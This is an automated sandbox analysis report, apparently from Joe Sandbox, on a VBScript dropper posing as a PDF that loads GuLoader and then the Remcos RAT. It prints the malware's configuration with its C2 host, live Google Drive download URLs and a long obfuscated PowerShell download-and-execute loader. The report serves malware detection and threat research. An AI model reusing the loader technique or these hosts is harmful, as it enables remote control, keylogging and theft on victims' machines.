Windows Analysis Report
A 413736796#U00b7pdf.vbs

Overview

General Information

Sample name: A 413736796#U00b7pdf.vbs (renamed because original name is a hash value)
Original sample name: A 413736796pdf.vbs
Analysis ID: 1523159
MD5: 3f5e0a8b0d1ac0143d359bcb63171066
SHA1: 7f6368b52a021340768f61ae047d88c7e6d4add3
SHA256: 8da5ed79da8da8c5521a238f05bb61bd1e48c59fab0bee7758fc11c163142396
Tags: vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7656 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7756 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3136 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 4916 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000005.00000002.1924109372.0000000008CF0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000005.00000002.1906272544.000000000611D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000005.00000002.1930442779.000000000BDEC000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_7756.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_8088.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | matched strings:
  • 0xc6d3:$b2: ::FromBase64String(
  • 0xb754:$s1: -join
  • 0x4f00:$s4: +=
  • 0x4fc2:$s4: +=
  • 0x91e9:$s4: +=
  • 0xb306:$s4: +=
  • 0xb5f0:$s4: +=
  • 0xb736:$s4: +=
  • 0x15c71:$s4: +=
  • 0x15cf1:$s4: +=
  • 0x15db7:$s4: +=
  • 0x15e37:$s4: +=
  • 0x1600d:$s4: +=
  • 0x16091:$s4: +=
  • 0xbf79:$e4: Get-WmiObject
  • 0xc168:$e4: Get-Process
  • 0xc1c0:$e4: Start-Process
  • 0x16918:$e4: Get-Process

System Summary

Source: Process started Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", ProcessId: 7656, ProcessName: wscript.exe
Source: Network Connection Author: frack113: Data: DestinationIp: 172.217.16.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3136, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
Source: Process started Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs", ProcessId: 7656, ProcessName: wscript.exe
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script omitted; the entry is truncated in the source]
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T07:46:28.837001+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 172.217.16.206 | 443 | TCP


AV Detection

Source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos (same configuration as listed earlier in this report)
Source: a458386d9.duckdns.org Virustotal: Detection: 13%
Source: A 413736796#U00b7pdf.vbs Virustotal: Detection: 11%
Source: Yara match File source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Malware configuration extractor URLs: a458386d9.duckdns.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 172.217.16.206:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP2
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.000002918190F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcP
              Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcXRul
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download
              Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1583462169.0000029180BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match File source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: amsi32_8088.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. 
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B22C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B22B276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B2FA09A
              Source: A 413736796#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6838
              Source: unknown Process created: Commandline size = 6838
              Source: amsi32_8088.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Sternman224.Ill
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fi2q2dr.4qz.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7756
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8088
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: A 413736796#U00b7pdf.vbs Virustotal: Detection: 11%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. 
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
